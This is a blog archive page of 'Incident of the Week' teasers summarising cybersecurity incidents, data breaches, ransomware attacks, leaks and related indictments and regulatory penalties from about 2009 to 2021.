If you aren’t following the ransomware attack on Kaseya’s VSA product and approximately 800-1500 of its users, you should be. Like many cyberattacks, this one came on the verge of a holiday weekend. As the company itself notes, “Kaseya’s VSA product has unfortunately been the victim of a sophisticated cyberattack. Due to our teams’ fast response, we believe that this has been localized to a very small number of on-premises customers only. … More
Category Archives: Incident of the Week
The SolarWinds Orion Hack: The Basics You Need to Know
By now, you have heard about the SolarWinds Orion hack. But what do you need to know about it?
First, if you want or need the technical details, the Cybersecurity and Infrastructure Security Agency (CISA) has them. In particular, on December 13, 2020, CISA released Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise, ordering federal civilian executive branch departments and agencies to disconnect affected devices.… More
Is the May 12 Massive Ransomware Attack a Turning Point?
Those “in the know” in the cybersecurity world have been aware for more than a year of the threat posed by ransomware, a type of malware that locks victims’ access to their files until they pay a ransom. But discussion of the threat was mostly localized to cybersecurity professionals, blogs like this one, and various guidances released by federal agencies during 2016. But ransomware may just have entered the general public consciousness in a big way.… More
Google Docs Phishing (in real time, May 3, 2017, 4:30pm)
If you check your email this afternoon, you may see a message that someone you know is sharing something on Google Docs. You should verify that separately before opening, as there is a widespread phishing attempt going around using such an invitation. More
Quick Thoughts About the Yahoo Breach
Another day, another 500 million Yahoo accounts breached. Our friends at the FTC are right on top of this with guidance for individuals with Yahoo accounts. First and foremost, change your Yahoo password.
According to Yahoo, the breached information may have included names, email addresses, telephone numbers, dates of birth, passwords, and security questions. Yahoo believes this information was stolen in late 2014.… More
Cybersecurity News and Notes – August 29, 2016
In Case You Missed It: Sometimes data breaches crop-up in the most unlikely of places. Last week we learned that the vendor that handles fish and hunting licenses for the states of Idaho, Oregon, and Washington was hacked. The breach potentially exposed the following information for those with fishing or hunting licenses in those northwest states: names, addresses, driver’s license numbers, dates of birth, and the last four digits of Social Security numbers. … More
Health Insurer Hit With A Record HIPAA Penalty: What Does It Mean?
Triple-S Salud Inc., a Puerto Rican health insurer, has been hit with a $6.8 million penalty from the Office of Civil Rights of the Department of Health and Human Services for a massive data breach. Triple-S (known as ASES in Spanish) has posted a notice on its website regarding the breach.
The penalty, which also is described in a securities filing, is based a breach involving 13,336 of Triple-S’s Dual Eligible Medicare beneficiaries. … More
TripAdvisor Reports Data Breach
If you are like me, you may have received an email from TripAdvisor, alerting you that "an unauthorized third party had stolen part of TripAdvisor’s member email list." The text of that email was as follows:
To our travel community:
This past weekend we discovered that an unauthorized third party had stolen part of TripAdvisor’s member email list. We’ve confirmed the source of the vulnerability and shut it down.… More
Health Net Announces Second Major Breach in Two Years; Creates Potential for Largest Ever Penalty
On March 14, the California-based managed care organization, Health Net, Inc., announced that it cannot account for "several server drives" that contained protected health information. According to California regulators, these servers appear to contain the data of 1.9 million people nationwide:
The company announced today that nine of its server drives containing personal information for 1.9 million current and past enrollees nationwide are missing, including records for more than 622,000 enrollees in Health Net products regulated by the DMHC,… More
Incident of the Week: Army Intelligence Analyst In Custody After Claiming that He Leaked Thousands of Classified Documents
22-year old U.S. Army intelligence analyst Bradley Manning is reportedly in custody in Kuwait after claiming that he sent 260,000 classified documents to the WikiLeaks website. According to WIRED, Manning, who served at Forward Operating Base Hammer near Baghdad in Iraq, made the admission after reaching out to former hacker Adrian Lamo in a series of Internet chats beginning on May 21st. Manning ominously began the conversation with the following:
(1:41:12 PM) Bradley Manning: hi
(1:44:04 PM) Manning: how are you?… More
Incident of the Week: Clickjacking Worm Induces Thousands of Facebook Users to “Like” Infected Websites
This week was an unusually optimistic one for hundreds of thousands of Facebook users who found that their accounts were automatically endorsing numerous oddly entitled websites. If you have been avoiding Facebook, your closest Facebook user (anyone under the age of 30 is a safe guess) can explain that one way users have to share things with their friends, including websites, musicians, television shows, ideas and other users,… More
Incident of the Week: Blogger Shows Us How to Listen In On Private Facebook Chat
Yesterday, Facebook took down their Chat services to patch a flaw in Facebook’s new privacy settings that allowed users to listen in on private chat conversations. This apparently came hours after TechCrunch EU blogger Steve O’Hear taught the world how to exploit the flaw in his TechCrunch post and video. O’Hear was “tipped off that there is a major security flaw in the social networking site that,… More
Incident of the Week: “Huge Social Networker” Indicted For Threatening Spam Email Campaign Against New York Life
Yesterday, a federal grand jury in New York issued an indictment (.pdf) against Anthony Digati based on his threats to use spam email and the www.newyorklifeproducts.com domain to drag New York Life Insurance Company “through the muddiest waters imaginable.” Both the U.S. Attorney’s Office press release (.pdf) and the FBI press release announced the indictment.
Digati was arrested on March 8,… More
Incident of the Week: NSA Officer Indicted For Emailing Classified Documents to Reporter
On Wednesday, a federal grand jury in Maryland indicted Thomas A. Drake, a former employee of the National Security Agency (NSA), on charges that he emailed classified NSA documents and information to Siobhan Gorman, then a reporter for the Baltimore Sun. Drake worked for the NSA first as a contractor and then as a high level employee in the NSA’s Signals Intelligence Directorate between 1991 and 2008,… More
Incident(s) of the Week: Disgruntled Hacker Disables 100 Cars Purchased from Texas Auto Center
In late February and early March, around 100 cars in and around Austin, Texas either would not start or would not stop honking. This was apparently caused by 20 year old hacker, Omar Ramos-Lopez, who remotely triggered the vehicle immobilization system installed by dealership Texas Auto Center.
Apparently the dealership installed the GPS-enabled devices so that cars can be immobilized and repossessed when a customer fails to make scheduled payments.… More
Incident of the Week: Israeli Soldier Posts Details of Planned West Bank Raid on Facebook
This week the Incident of the Week title decisively goes to the Israeli soldier who updated his status on Facebook to identify the secret military raid on a town in the West Bank. His status apparently read: “On Wednesday we clean up Qatanah, and on Thursday, god willing, we come home” and provided the exact time of the raid. After detecting the clear breach of OPSEC,… More
Incident(s) of the Week: February A Tough Month For Hackers
1. Arrested: Russian Hacker Responsible for Two Minutes of Roadside Porn
The hacker who managed to compromise computer servers controlling a large commercial advertising screen in Moscow was arrested recently by Russian authorities. On January 14, 2010, commuters on Moscow’s Garden Ring Road passed a large-scale video screen and instead of the normal commercial advertisements saw two minutes of hard-core pornography. The video, as well as the resulting traffic problems,… More
Incident of the Week: Patents Help Crack Encryption Used in Cordless Telephones
This week cryptographers Karsten Nohl from University of Virginia and Erik Tews of the Darmstadt University of Technology announced that they had broken the DECT encryption standard. Who cares, you ask? The Digital Enhanced Cordless Telecommunications or DECT standard is what prevents someone parked outside your house from being able to listen in on telephone conversations you are having on your 1.9 GHz DECT cordless phone. (So, that’s what that label on the receiver means.)
Nohl told Dan Goodin from The Register that he cracked the code by putting the DECT chip under the electron microscope and then comparing his findings with information disclosed in the published patent(s). … More
Incident of the Week: Free iPhone Password Breaker Released
Back in October you may remember our post on Elcomsoft, a Russian software company that came out with program to decrypt common wireless network signals. Well, they’re back this week with a program that will "enable[ ] forensic access" to password-protected backups for Apple iPhone and iPod touch devices. In other words, if someone obtains access to the computer you use to sync your iPhone they could also get access to "backups containing address books,… More
Incident of the Week: OIG Reports that the FBI Routinely Circumvented Electronic Communications Privacy Act
A report entitled A Review of the Federal Bureau of Investigation’s Use of Exigent Letters and Other Informal Requests for Telephone Records (.pdf) from the Department of Justice Office of the Inspector General (OIG) indicates that between 2003 and 2005, FBI routinely “circumvented the requirements of the Electronic Communications Privacy Act (ECPA)” by using so-called “exigent letters” to obtain telephone call data from telecommunications companies. … More
Incident(s) of the Week: Recent Updates from Prior Incidents
1. The FTC Fines Las Vegas Man $35,000 for Dumping Customer Financial Records In Public Dumpster
This week, the FTC finalized a $35,000 settlement with Gregory Navone, the real estate broker who left 40 boxes of customer tax returns, bank statements, consumer reports and other financial records in a public dumpster behind an office building in Las Vegas. The defendant agreed to the fine, which amounts to $875 per box,… More
Incident of the Week: Twitter Used In Sting Operation To Find Out Who Leaked TSA Security Directive
Rumors are circulating that Special Agents from the Transportation Security Administration (TSA) have been posing as a Connecticut blogger on Twitter to find out who leaked airport security screening procedures put in place after the recent attack by the “underwear bomber.” This is a new twist in what some are describing as an overzealous investigation of government documents posted online.… More
Incidents of the Week: Iranian Cyber Army Targets Twitter & $26 Software Application Intercepts U.S. Military Satelite Feeds In Iraq
1. Iranian Cyber Army Puts Twitter On Hold
Around 10 pm last night, popular social networking site Twitter, was apparently hacked by a group calling themselves the Iranian Cyber Army. Iran and Twitter have had a rocky relationship since last summer when Iranian citizens spread the protests over Iranian elections to the popular web site. During that time, links circulated on Twitter that allowed users to participate in DoS (Denial of Service) attacks on Iranian government websites. … More
Incident of the Week: Hack of Researchers’ Email Triggers “Climategate”
Compared to security breaches that involve credit card and bank account information, other breaches in security often get somewhat shortchanged in the media, notwithstanding the occasional hack of a celebrity cell phone. The same cannot be said of the purloined emails one hacker posted online that are alleged to the the back and forth between climate change researchers at the University of East Anglia in the United Kingdom which are at the center of new controversy in public debate over climate change.
Incident of the Week: U.S. Law Firms and Public Relations Firms Hit By E-mail Attack
Law firms holding sensitive data for their clients are the targets of a new round of organized cyberattacks, federal authorities cautioned this week. On Tuesday, the FBI warned that U.S. law firms and public relations firms were being targeted by hackers using “spear phishing” attacks — personalized emails drafted to look like they come from a trusted or reputable source and designed to induce the reader to click an attachment or link that will infect his or her computer with malicious software. … More
Incident of the Week: ChoicePoint Settles FTC Charges That It Failed To Turn On “Key Monitoring Tool”
This week, ChoicePoint, Inc. finalized its settlement with the Federal Trade Commission (FTC) to resolve charges stemming from a 2008 breach that compromised the personal information of 13,750 consumers. This case is notable, even though the size of the breach and the monetary payment involved are relatively modest, because the underlying breach allegedly resulted from the ineffective implementation of security tools.
Incident of the Week: Russian Company Proves That WiFi/Wireless Networks No Longer Secure
ElcomSoft Co. Ltd., a Moscow-based software company, has announced that its software can unlock wireless networks using a PC fitted with a high-end consumer graphics cards. This software would appear to allow anyone to intercept internet traffic over wireless networks encrypted using common encryption algorithms. The easy availability of this software may mean that companies using WiFi/wireless networks may need to take additional security steps to comply with information security rules in the U.S. and Europe.
Incident of the Week: Ever-Growing Breach Involving Passwords for Hotmail, Gmail, Yahoo, AOL, Earthlink and Comcast
Incident(s) of the Week: Double Feature
Incident of the Week: in our first double feature, we report on the recent breach announced at the University of North Carolina and the plea agreement reached with one Massachusetts inmate who hacked the prison computer system while still behind bars.
Incident of the Week: Declassified Documents Show FBI Expanding Data Mining Efforts Over 1.5 Billion Personal Records (And Counting)
Declassified documents obtained (but not published) by WIRED Magazine indicate that the FBI has been hard at work expanding a database of Americans’ personal and financial information. According to WIRED, the FBI’s National Security Branch Analysis Center (NSAC) has compiled a database of “more than 1.5 billion government and private-sector records” and has been mining this database for use in criminal investigations. The data, which apparently has been obtained from a number of private companies,… More
Incident of the Week: Security Officer Indicted On Obstruction of Justice Charges For Shredding Evidence
Thomas Raffanello, global director of security for Stanford Financial Group (SFG), now faces charges of obstruction of justice based on claims that he directed employees at SFG’s Fort Lauderdale office to shred evidence of fraud.
In February, the Securities and Exchange Commission (SEC) filed a complaint against SFG (.pdf) in Texas alleging that the double-digit returns it promised potential customers was part of a fraudulent scheme. … More
Incident of the Week: Indictments Issue Against The Individuals Behind RNS, Pirate Site for “Pre-Release” Music
Yesterday, a federal indictment issued charging four individuals for their role in the "Rabid Neurosis" or RNS, an alleged "Internet music piracy group" that distributed copies of music prior to their commercial release. According to the seven-page indictment (.pdf) filed in the federal court for the Eastern District of Virginia, between 1999 and 2007, RNS obtained and distributed a number of notable albums before they were released,… More
Incident of the Week: NCUA Issues Fraud Alert Based On Fake NCUA Fraud Alert (Which Turns Out To Be Part of Security Consultant’s Penetration Testing)
The National Credit Union Administration (NCUA) issued an official NCUA Fraud Alert on August 25, 2009 reporting that someone was sending around a fake NCUA Fraud Alert (.pdf) with CDs purporting to contain security software updates, but instead contained malware. The NCUA warned “Should you receive this package or a similar package DO NOT run the CDs.” The NCUA, which regulates federally insured credit unions,… More
Incident of the Week: Social Networking Sites Used as Command and Control Structure for BotNets
Are you having trouble making sense of social networking sites like Twitter? It may be because you are trying to read an encoded command to a malware-infected computer. Security consultant Jose Nazario at Arbor Networks has discovered that popular social networking sites like Twitter and Jaiku are being used to control botnets, armies of computers that have infected with malware enabling the individual controlling the botnet to steal user information and direct the computers to attack others. … More
Incident of the Week (Year?): Hacker Responsible for Largest Data Breach in U.S. History Indicted
According to a press release from the United States Attorney’s Office for the District of New Jersey, yesterday an "indictment was returned against three individuals who are charged with being responsible for five corporate data breaches, including the single largest reported data breach in U.S. history." According to the press release, the indictment describes a scheme whereby Albert "Segvec" Gonzalez and two unnamed Russian defendants (identified as "Hacker 1"… More
Incident of the Week: Seattle Man Sentenced To Three Years In Prison For Using Peer-To-Peer Software To Steal Financial Records, Commit Identity Theft
Yesterday, Frederick Eugene Wood of Seattle was sentenced to 39 months in prison for using LimeWire peer-to-peer (P2P) software to obtain Social Security numbers, bank and financial records and tax returns, which he then used to commit identity theft. The complaint (.pdf) filed in federal court for the Western District of Washington in March alleged that Wood took advantage of the fact that users sometime install LimeWire or other peer-to-peer software on computers without limiting the directories and files made available to the peer-to-peer network. … More
Incident of the Week: Lativan Internet Service Provider Shut Down After Being Linked to Cybercrime Ring
Earlier this week, Latvian internet service provider Real Host was shut down by its upstream providers Junik and TeliaSonera after security experts linked Real Host to a number of criminal activities. Among the many activies allegedly conducted through Real Host were the use of malware to steal banking credentials, SPAM email campaigns and the service provider was running command and control servers for the Zeus botnet (i.e.,… More
Incident of the Week: Hackers to Demonstrate How To Take Control Over Every Apple iPhone In The World With A Single Text Message Today
Speaking at the Black Hat computer security conference in Las Vegas only a few hours from now, hackers (or "security experts") Charlie Miller and Collin R. Mulliner are scheduled to expose an alleged security flaw in the Apple iPhone that may allow someone sending a single SMS message to take control of any iPhone. According to a number of reports (note Forbes and AppleInsider),… More
Incident of the Week: UAE Carrier Updates Blackberry Software With Spyware, Captures Outgoing User Emails
On Tuesday, Research In Motion, Ltd. (RIM), the maker of Blackberry, posted a note on its website confirming that a software update offered to customers of its carrier Etisalat in the United Arab Emirates contained spyware. According to the note, certain customers received an SMS message from Etisalat informing them of a software update (named “Registration”) designed to improve performance. However, RIM acknowledged, “[i]ndependent sources have concluded that Etisalat’s Registration software application is not actually designed to improve performance of a Blackberry Handheld,… More
Incident of the Week: French Hacker Compromises Twitter Employee Passwords, Steals Company Documents
This week, Twitter co-founder Evan Williams confirmed that the company has been the victim of an attack that compromised a number of employee personal accounts at Amazon, PayPal and AT&T, employee personal email and Twitter’s internal company documents. The hacker, who goes by the handle “Hacker Croll,” has apparently emailed a collection of 310 internal Twitter documents to TechCrunch, including a presentation for a proposed reality television show called “Final Tweet”… More
Incident of the Week: Goldman Sachs Programmer Arrested for Transfer of Top Secret Source Code for Goldman’s Automated Trading System
On July 3, 2009, FBI arrested Sergey Aleynikov, a Goldman Sachs programmer, as he disembarked at Newark airport on charges that he violated the Electronic Espionage Act (18 U.S.C. sec. 1832) when he sent company data to an overseas document server.
Incident of the Week: FBI Arrests Hacker Posing as Security Guard Who Infiltrated Texas Hospital Days Before “Devil’s Day” Attack
This week, the U.S. Attorney’s Office for the Northern District of Texas announced that the FBI has arrested Jesse William McGraw, a 25 year old contract security guard at the W. B. Carrell Memorial Clinic, a hospital in Dallas, Texas, for hacking the hospital’s computers and air conditioning system. For many businesses, an attack on ventilation systems might be an inconvenience, but the threat could be much more serious for critical care patients in healthcare institutions like the Carrell Clinic. McGraw is charged with violations of the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. sec. 1030.